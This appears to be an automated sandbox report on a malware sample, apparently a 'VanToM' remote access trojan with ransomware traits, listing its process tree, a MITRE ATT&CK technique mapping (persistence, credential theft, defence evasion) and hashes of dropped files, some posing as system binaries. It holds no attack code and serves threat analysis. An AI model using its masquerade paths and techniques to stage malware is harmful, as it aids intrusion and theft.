- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
  OfficeC2RClient.exe /error PID=6832 ProcessName="Microsoft Word" UIType=3 ErrorSource=0x8b10082a ErrorCode=0x80004005 ShowUI=1
  2⤵
  - Process spawned unexpected child process
  PID:6096

C:\Users\Admin\Downloads\VanToM-Rat.bat
"C:\Users\Admin\Downloads\VanToM-Rat.bat"
1⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious use of FindShellTrayWindow
PID:8336
- C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe
  "C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of FindShellTrayWindow
  PID:8636

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:8728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Persistence

T1070.009

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe

Filesize
3.0MB

MD5
81aab57e0ef37ddff02d0106ced6b91e

SHA1
6e3895b350ef1545902bd23e7162dfce4c64e029

SHA256
a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287

SHA512
a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717

Download Submit
C:\Program Files\Java\jdk-1.8\jre\lib\YOUR_FILES_ARE_ENCRYPTED.HTML

Filesize
4KB

MD5
a2f7069b7088d66ecaad52cfd7ba6cc0

SHA1
8c5d0c667ae670ec4e6c3817bca0f01178d52dbd

SHA256
84a5c9362cc391bf2d0008b33a16d39be40b631a38ca7bec4ddb431684304105

SHA512
2f8f077666151cb7c969ca50f110eaf3638aa2932abecbd70cff8b4366e44609761aae869acef155c484ad213620d99a6546d716ad770f7a4d74b3045de8cabe

Download Submit
C:\ProgramData\Hdlharas\dlrarhsiva.exe

Filesize
9.1MB

MD5
64261d5f3b07671f15b7f10f2f78da3f

SHA1
d4f978177394024bb4d0e5b6b972a5f72f830181

SHA256
87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

SHA512
3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

Download Submit
C:\ProgramData\Hdlharas\mdkhm.zip

Filesize
56KB

MD5
b635f6f767e485c7e17833411d567712

SHA1
5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

SHA256
6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

SHA512
551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.12\autofill_bypass_cache_forms.json

Filesize
127B

MD5
22e4cc4c0eb6444f7cae2aa35a707227

SHA1
86fd42f17be0b1fa10b170cfe18d49930ed35044

SHA256
e409a4f42c50d8fc80facaad15b807779658fc97b01c871d0820577dd8f334b7

SHA512
a3e41584d8d2dab323a4846321658f759573ba694e877a8e4abb7ec08d30213db509a64bdf1b561491faf9aed5cb31be2481d505f4ef56838e5df6e1e6c820d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.12\edge_autofill_global_block_list.json

Filesize
4KB

MD5
ba6dff9e296c4dab26f3f61893502cbb

SHA1
02b6bb7ef39485c2aac70038c1555d09632e8414

SHA256
4576e2d9e040c1dba48610bb4b41c117aa1858c3de0ad26cdcd3700323b168f4

SHA512
8e72310fe5bf20c3716bb6dcfd119e2904ca0eb0d12e67669e656aedf023f078d897b5db577023068d2f0222168f2c99d64acefb1ec1e8e9116fa78e9e2e9c7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.12\v1FieldTypes.json

Filesize
509KB

MD5
630f694f05bdfb788a9731d59b7a5bfe

SHA1
689c0e95aaefcbaca002f4e60c51c3610d100b67

SHA256
ad6fdee06aa37e3af6034af935f74b58c1933752478026ceeccf47dc506c8779

SHA512
6ee64baab1af4551851dcef549b49ec1442aa0b67d2149ac9338dc1fe0082ee24f4611fcc76d6b8abeb828ad957a9fa847cbc9c98cdf42dd410d046686b3769b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
a143487e6dcf123f44e56ad28f351ba0

SHA1
b53f5dc3188440fa88fb3b151a04ea01f81a44b7

SHA256
3b67b66821c621dd0aace582246dff0644e26f67b904aba4e63657d6d5868d47

SHA512
652b3a8e63e18404e5c0a833f3fda691116eee5bfc91c7dd6281d6f8277b6dbe3bdc49ee059cc355bff459b09bf33d335197a3ee16abce482786fabc9b9c3256

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
4e2d220eb52878c0f3f477a00658d4b4

SHA1
a9b8e93923cd77499f6fa11c13a5fc9ffde26530

SHA256
d807fad441608e18cc0b47766108cc7cb7d7301d072810bcc461834a09310d2f

SHA512
f70bcfb03ca5a610e424d72e27eb075b0b36a292efe82c219ba5ad0faa9b4eabe6565988943d90f82c13bd6f845d14d5fe109849f8db5610f50ebbabd277f99a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
6c68927db8c78daf538621d019798089

SHA1
4476f4e0457a66aebb3ced9a7d8ada3160628342

SHA256
521e67a289474f403248f485a4e4b0f6c94afc7a41c0bdb29ddb84b7669d2391

SHA512
417989d04fd943da224467dfb8ac76025da9b0520dafeda960f20598834535a3a669580c7f21564a21b29de240ea4b07904a185053b3ff2cccbb91784ce1b935

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
d88e31b9fce013ef37ac894d50ea27a9

SHA1
30d2b26125174d3598380753dac6e3fa535e4937

SHA256
3c388843c3736c062f98e1812d6169d681daf759cee74c63f66552ba4a3db0d3

SHA512
88eff762ef7dba048e18c0b992cec9e2f1f2fcbb572631dceb599336e2f90ab4aa811fcc8914f033bbfc6d9b2def449b1ef7444ab1d5f1452edb115b6a584d81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
70065d8582456fcf3ba810c5f1cad165

SHA1
94125e6795e295488503f0a2cc9c3d41f4cae281

SHA256
9d48fdc1f7ba803b684270eaabdb2a065679cd135a379f23c5f7639de44b190b

SHA512
bdf45b7736edba9c161c32f0342ee459d260fc72ab317ac637daca84cffef9cfa560a090c76883668fa3e41d592c99e77c12367e70b8ded234ee79f307013646

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
eb5d6e84cd0eaed8bfb561134df09e0d

SHA1
14362e783af6bea351bb48bbeebac4df5368e19e

SHA256
d6382a23f8bbc2ee86a695553c2773942dd24920a7762142d35ff2ed50586cb6

SHA512
ec517ca53594f52908f193ff520e387b64c0b242ce640c3679d3f3392ec5e4d6ef72f5a4987c3c65b1f7d1e6918c3339be7ab5a565cb496f87d8f2f5eeed4d2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
d28a3522564dda3a6d007aa1f702af37

SHA1
38238f1072bf2791c174116e5221b9112df74ae7

SHA256
23356513f889606552b7defc856efdebf38767217a3476a1001bef73dd519d8a

SHA512
82a4b6f7ba05180ba2c336a1a98bebb76ac25bc274bc23c808c7e150fa67bd551d6d864f32505d6fb80c0850fd2aaceb219d678e390fa875314d2d5c901237ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
37KB

MD5
dca3f90b821e003d8624ff350c50efaa

SHA1
7d378cad312a822c4baf97e9187efde8885b2589

SHA256
1d734c13b6f9f91cb06a14759cb2b53a1240fc2eeaa46eb0259e817ac4504221

SHA512
4f3399385eb1649bbe7daa389eec7cd4f4ec9681d7a619c61aa61cd0d8629fe7ba004b25deb78572722c3acfeffa47cb6bf7037f78d86dcf0666aa04914ac5ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
5KB

MD5
2f974a14a2dfc5d775903fd28bc757c1

SHA1
d1d6629876426e2677a33eda003d8d328e32c452

SHA256
fb299679e7e922cce792427e1bb9652c58ef2790954de11e5bdfa1020ef33fe4

SHA512
78a9f1134822d097e3053ffec8d49b025e87ad926556af38d629f4c862675a15f590dcf624b5dd8dee477951b4ef0f61b1bdbf0a891e94fe7ed1a5e6457253c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.3.9\data.txt

Filesize
112KB

MD5
fd8717bad7cd0f60163e7c2b05210aaa

SHA1
1dd620b2a4b49d16a63d3b73495bbb0388cbdbc9

SHA256
d5facea6ed705ea08962d52a30ebf38f6d42aea50a7af21b103d0388b7dae34a

SHA512
7b3d3867977b04efce86c5cce45ae0125d25344fa85347a83977faaa9ecd205774a976be63d6af48b953b4ca355405aa090d6db482073f77d71607c948acb5ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
463B

MD5
49a6400a8bf5ddbdc1ff6e30048e732e

SHA1
e740a22dabd1d50e80e7cf76b2f8bda703ffc78e

SHA256
9a24fa0c25108c4cbe5da17d950ddba19288d976f4980594ae494323fdfc3fb0

SHA512
e964b80afc5bb506353d069996b9673c26849f75b637f47970401184bd1cbebed6ee330307cab10624ca1e0b15805253cead4b664a7486ab7c6395f44989a410

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
18KB

MD5
178f5c689caf31709c93ddad46f1c5bf

SHA1
f48164b3f08cd8a4cd233e60c47258468a33139e

SHA256
a5ee7a681ddf8f049e11e73f4dc322396c0dac746c39e7ad7fc1e1a088fcce54

SHA512
d3da1987eff259189a0bc3c2ae3520f45f1f326720e29568311c4a8643b3aaa00d3061471ac3b6eb58f7eb55bf8ed110efb82518debf8d3bba8ffdc712d897a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

Filesize
19KB

MD5
290c46250b8c14d38ed38031d0c4bf71

SHA1
a2c1c18a4d3c882e9716ee14151a86b509079403

SHA256
099faaa6e6c16895e5890deefc070844c1a54949378cee201305f40f2a8a9120

SHA512
3c64c2a5a9f9d33e38e206f43142ec27897f109b9af6629639b5618a62da4dd9305d57f0005db505384dd6b40c9779777e2f0342cf0d175f0d75624680971186

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\f0f3396d-fa49-442e-a0aa-a41efb7b93ba.tmp

Filesize
894B

MD5
2486a1f22347fc448ebfcbb760785006

SHA1
5f8443656cbf0d629406ac95b91a1872e949f61d

SHA256
21ef749faad79db188089fa6b58d14f1cc981fb4accf0e32c258c05f22c9e7ad

SHA512
ceb0a67784c2361407ec8d0066c370d704bc9872c06c836b1743f98d534805b1b07fa3ace05dd62d84c2dd6afd6830e8b4c6b8f374db46f402aad39bc9793d03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
65KB

MD5
80982befa1014bb57f3a83d91c4605f1

SHA1
e2a779a6dbde68f7ee5a098e7dcaff4eb265e9e5

SHA256
f8cfbe2633b63b7c4b4320b64494be6226572f2f7db1a881d25076b582c6b1bd

SHA512
4893332503eec613bae27d557d68e1552eebba4175d16c069ac0527538a48925f7bd942e7899ca97b479127ce525b8af860c2ffd66b9d5bcae3d15d617904e20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
65KB

MD5
6ee74548f86f5b3658fb8eeafc377aba

SHA1
d8420471b272fce061695af1c8798d2ce33032ac

SHA256
46c7e197bb7f73c67d28af03a38d15c2ae76f8375de1d2ea65cc213295a0d271

SHA512
70d4ffa630edfa486810757a52f1eb52a2bf9d72ee305e456445a2d50f95638f77c7613442d8396da4b0147fdf5ef597381b2d95e839f0c0192ccbc55e001139

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
65KB

MD5
bd157165947c1d266f5240e4e2ca89fe

SHA1
e6d640e02afbd9f13667ac61abcf7488663d8809

SHA256
5bfcd9d677a942e7e8c3d3eb0cd52425c2574ccb725694689f5a1eb9c2c0bc0f

SHA512
49aa6798d6182fbd3660a16d6f6968ce9183ee55bf175e82319f89343e48fb0b4dffa05aec00f1af82f33a044a094e3933ebda06bf9135faf580f913574ef575

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
66KB

MD5
e32d64088c7319d80fc88e4557bc4116

SHA1
557da15f7b69d1bf148a3c95494ec7d004ef65cf

SHA256
537d30b68b1be1243f99bcd06c67188b1db094ad3739d65fbe0bd52bca5ad847

SHA512
e7b5376b220daf024d71b55625dbd99a8ffb11c226f8c9397d0dabb10b0ced43e4b560e2a51fb80d1266a7afd0b825faf833134923f0e09f615089e95bdb1a48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
65KB

MD5
d37ce05527c0e2b8e2b2bbb0c947c6bb

SHA1
8df3ed539aef41a132939b13088d252b402903ed

SHA256
5a33c2c5d13101a5df06289ca31c393a1eb03b688478c3d25ffae91856302269

SHA512
35f8c3ca4086a94af16ba945006885c05b68e3c14b8c4c55435232f57cee856e6d12c300743a6d6e1782e387eb902a7e6015de151ab95d534af7d5aed948d6a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\21.0.0.0\crs.pb

Filesize
289KB

MD5
24a3775317d74ceea8fba6f0cfbce562

SHA1
fed5009eb51938d0894a9bb7aee8a97873d9b6f3

SHA256
192b206ad6f649f6c8767f6a3b11d9c5354710602bf0aeb4157eea08d7461ef7

SHA512
245951359283bff026aad50f7768a9aa59c1926ca7aa441c8f6a3715be34925332eeef4115a442a7841429400105d59d13937ee3aa9b80e83f1982893aefaa8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\21.0.0.0\ct_config.pb

Filesize
10KB

MD5
09b6469de61db3473bdfe04951f08529

SHA1
d64b455ae9c65d8d8629a128a9f3505ef3df3555

SHA256
1c435f4448dcf1784637fa9470546d12d7db2420a11cf8b5d6343439dd401c60

SHA512
049d3c0e05aa3ab1d4d51cc5bd72603f47aa33141bf771cb86baedc19b8973911445ce74256ff1118483175cf4a104262a22ae9431a6366cbd1f7d28553fcbb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\21.0.0.0\kp_pinslist.pb

Filesize
11KB

MD5
2d8bcb7c4b2dc669429bd40f7048f62a

SHA1
43a332c99105dcfb67893ea167879c3ce6bac8db

SHA256
7a0866cdd7bd21b8b08d166edb3f6adf8c859b47988b9b3ba3f0eaafabe10ff2

SHA512
15d3c7c6df2c3c75daf7ea9165687c5a6f8acac3dfe83573e20aa1bd425dde8fc659fc2c1b050b3e8ddb28358a96b9e0c083e61fa5d63ae34fa4b0bb63db8a76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.2.22.1\typosquatting_list.pb

Filesize
635KB

MD5
27f8d021cbdb3453286dcdda9cdf2e03

SHA1
b89db6ab813a78a513af35b6fccc3f02ff514688

SHA256
f455325729b3d78bd6799e930811172a90a27f746c77a183be514a32bb43eb21

SHA512
0d72fcedda21ce12660a5c7cf85584345de916e6899ffde24188f1e8b9906061a7a92b59beccb629155bb842db0fdec5b13d3468e00f2740101fcb55f41b64f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Well Known Domains\1.1.0.0\well_known_domains.dll

Filesize
556KB

MD5
26da22c7706cdcd809c380207c7b2246

SHA1
96ce397cc80b5a39319c34cadcf19e36e6a90b77

SHA256
87b9a43450a28f41a933817d10f064401d4c58ec2dbd85d8b1d843685d46c29c

SHA512
22d7a38f558f0069b17fabcb33ffae288470b93f31180d728629206838f6f0ac0dfe916d70ce6fc7697bc9fabe1d9c515716abacd3231aed83d3cfc42bd265e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe

Filesize
553KB

MD5
57bd9bd545af2b0f2ce14a33ca57ece9

SHA1
15b4b5afff9abba2de64cbd4f0989f1b2fbc4bf1

SHA256
a3a4b648e4dcf3a4e5f7d13cc3d21b0353e496da75f83246cc8a15fada463bdf

SHA512
d134f9881312ddbd0d61f39fd62af5443a4947d3de010fef3b0f6ebf17829bd4c2f13f6299d2a7aad35c868bb451ef6991c5093c2809e6be791f05f137324b39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-100.png

Filesize
1KB

MD5
72747c27b2f2a08700ece584c576af89

SHA1
5301ca4813cd5ff2f8457635bc3c8944c1fb9f33

SHA256
6f028542f6faeaaf1f564eab2605bedb20a2ee72cdd9930bde1a3539344d721b

SHA512
3e7f84d3483a25a52a036bf7fd87aac74ac5af327bb8e4695e39dada60c4d6607d1c04e7769a808be260db2af6e91b789008d276ccc6b7e13c80eb97e2818aba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-125.png

Filesize
1KB

MD5
b83ac69831fd735d5f3811cc214c7c43

SHA1
5b549067fdd64dcb425b88fabe1b1ca46a9a8124

SHA256
cbdcf248f8a0fcd583b475562a7cdcb58f8d01236c7d06e4cdbfe28e08b2a185

SHA512
4b2ee6b3987c048ab7cc827879b38fb3c216dab8e794239d189d1ba71122a74fdaa90336e2ea33abd06ba04f37ded967eb98fd742a02463b6eb68ab917155600

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-150.png

Filesize
2KB

MD5
771bc7583fe704745a763cd3f46d75d2

SHA1
e38f9d7466eefc6d3d2aaa327f1bd42c5a5c7752

SHA256
36a6aad9a9947ab3f6ac6af900192f5a55870d798bca70c46770ccf2108fd62d

SHA512
959ea603abec708895b7f4ef0639c3f2d270cfdd38d77ac9bab8289918cbd4dbac3c36c11bb52c6f01b0adae597b647bb784bba513d77875979270f4962b7884

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-200.png

Filesize
2KB

MD5
09773d7bb374aeec469367708fcfe442

SHA1
2bfb6905321c0c1fd35e1b1161d2a7663e5203d6

SHA256
67d1bb54fcb19c174de1936d08b5dbdb31b98cfdd280bcc5122fb0693675e4f2

SHA512
f500ea4a87a24437b60b0dc3ec69fcc5edbc39c2967743ddb41093b824d0845ffddd2df420a12e17e4594df39f63adad5abb69a29f8456fed03045a6b42388bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-400.png

Filesize
6KB

MD5
e01cdbbd97eebc41c63a280f65db28e9

SHA1
1c2657880dd1ea10caf86bd08312cd832a967be1

SHA256
5cb8fd670585de8a7fc0ceede164847522d287ef17cd48806831ea18a0ceac1f

SHA512
ffd928e289dc0e36fa406f0416fb07c2eb0f3725a9cdbb27225439d75b8582d68705ec508e3c4af1fc4982d06d70ef868cafbfc73a637724dee7f34828d14850

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-100.png

Filesize
2KB

MD5
19876b66df75a2c358c37be528f76991

SHA1
181cab3db89f416f343bae9699bf868920240c8b

SHA256
a024fc5dbe0973fd9267229da4ebfd8fc41d73ca27a2055715aafe0efb4f3425

SHA512
78610a040bbbb026a165a5a50dfbaf4208ebef7407660eea1a20e95c30d0d42ef1d13f647802a2f0638443ae2253c49945ebe018c3499ddbf00cfdb1db42ced1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-125.png

Filesize
3KB

MD5
8347d6f79f819fcf91e0c9d3791d6861

SHA1
5591cf408f0adaa3b86a5a30b0112863ec3d6d28

SHA256
e8b30bfcee8041f1a70e61ca46764416fd1df2e6086ba4c280bfa2220c226750

SHA512
9f658bc77131f4ac4f730ed56a44a406e09a3ceec215b7a0b2ed42d019d8b13d89ab117affb547a5107b5a84feb330329dc15e14644f2b52122acb063f2ba550

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-150.png

Filesize
3KB

MD5
de5ba8348a73164c66750f70f4b59663

SHA1
1d7a04b74bd36ecac2f5dae6921465fc27812fec

SHA256
a0bbe33b798c3adac36396e877908874cffaadb240244095c68dff840dcbbf73

SHA512
85197e0b13a1ae48f51660525557cceaeed7d893dd081939f62e6e8921bb036c6501d3bb41250649048a286ff6bac6c9c1a426d2f58f3e3b41521db26ef6a17c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-200.png

Filesize
4KB

MD5
f1c75409c9a1b823e846cc746903e12c

SHA1
f0e1f0cf35369544d88d8a2785570f55f6024779

SHA256
fba9104432cbb8ebbd45c18ef1ba46a45dd374773e5aa37d411bb023ded8efd6

SHA512
ed72eb547e0c03776f32e07191ce7022d08d4bcc66e7abca4772cdd8c22d8e7a423577805a4925c5e804ed6c15395f3df8aac7af62f1129e4982685d7e46bd85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-400.png

Filesize
8KB

MD5
adbbeb01272c8d8b14977481108400d6

SHA1
1cc6868eec36764b249de193f0ce44787ba9dd45

SHA256
9250ef25efc2a9765cf1126524256fdfc963c8687edfdc4a2ecde50d748ada85

SHA512
c15951cf2dc076ed508665cd7dac2251c8966c1550b78549b926e98c01899ad825535001bd65eeb2f8680cd6753cd47e95606ecf453919f5827ed12bca062887

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-100.png

Filesize
2KB

MD5
57a6876000151c4303f99e9a05ab4265

SHA1
1a63d3dd2b8bdc0061660d4add5a5b9af0ff0794

SHA256
8acbdd41252595b7410ca2ed438d6d8ede10bd17fe3a18705eedc65f46e4c1c4

SHA512
c6a2a9124bc6bcf70d2977aaca7e3060380a4d9428a624cc6e5624c75ebb6d6993c6186651d4e54edf32f3491d413714ef97a4cdc42bae94045cd804f0ad7cba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-125.png

Filesize
4KB

MD5
d03b7edafe4cb7889418f28af439c9c1

SHA1
16822a2ab6a15dda520f28472f6eeddb27f81178

SHA256
a5294e3c7cd855815f8d916849d87bd2357f5165eb4372f248fdf8b988601665

SHA512
59d99f0b9a7813b28bae3ea1ae5bdbbf0d87d32ff621ff20cbe1b900c52bb480c722dd428578dea5d5351cc36f1fa56b2c1712f2724344f026fe534232812962

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-150.png

Filesize
5KB

MD5
a23c55ae34e1b8d81aa34514ea792540

SHA1
3b539dfb299d00b93525144fd2afd7dd9ba4ccbf

SHA256
3df4590386671e0d6fee7108e457eb805370a189f5fdfeaf2f2c32d5adc76abd

SHA512
1423a2534ae71174f34ee527fe3a0db38480a869cac50b08b60a2140b5587b3944967a95016f0b00e3ca9ced1f1452c613bb76c34d7ebd386290667084bce77d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.scale-200.png

Filesize
6KB

MD5
13e6baac125114e87f50c21017b9e010

SHA1
561c84f767537d71c901a23a061213cf03b27a58

SHA256
3384357b6110f418b175e2f0910cffe588c847c8e55f2fe3572d82999a62c18e

SHA512
